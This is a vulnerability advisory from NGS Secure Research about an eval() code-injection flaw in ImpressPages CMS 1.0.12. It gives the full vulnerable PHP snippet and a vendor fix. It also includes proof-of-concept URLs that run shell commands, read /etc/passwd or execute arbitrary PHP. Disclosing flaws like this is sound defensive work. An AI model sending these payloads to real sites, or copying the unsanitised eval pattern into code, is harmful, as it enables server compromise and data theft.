======= Summary ======= Name: Remote code execution in ImpressPages CMS Release Date: 5 January 2012 Reference: NGS00109 Discoverer: David Middlehurst <david.middlehurst@xxxxxxxxxxxxx> Vendor: ImpressPages Vendor Reference: Systems Affected: ImpressPages CMS 1.0.12 Risk: High Status: Published ======== TimeLine ======== Discovered: 28 August 2011 Released: 28 August 2011 Approved: 28 August 2011 Reported: 5 September 2011 Fixed: 21 September 2011 Published: 5 January 2012 =========== Description =========== ImpressPages CMS (1.0.12) is prone to a remote command execution attack due to an unsanitised eval() code execution flaw. ================= Technical Details ================= http://host/impresspages/?cm_group=text_photos\title\Module();echo%20shell_exec('ls%20-alh');echo&cm_name=test http://host/impresspages/?cm_group=text_photos\title\Module();echo%20file_get_contents('/etc/passwd');echo&cm_name=test http://host/impresspages/?cm_group=text_photos\title\Module();[[ArbitraryPHP Code Here]];echo&cm_name=test The affected code: File: /ip_cms/modules/standard/content_management/actions.php Line 37 if(isset($_REQUEST['cm_group']) && isset($_REQUEST['cm_name'])) { eval (' $new_module = new \\Modules\\standard\\content_management\\Widgets\\'.$_REQUEST['cm_group'].'\\'.$_REQUEST['cm_name'].'\\Module(); '); $new_module->makeActions(); } =============== Fix Information =============== Please update all instances of Impress Pages to the 1.0.13 release: http://www.impresspages.org/news/impresspages-1-0-13-security-release/ NGS Secure Research http://www.ngssecure.com
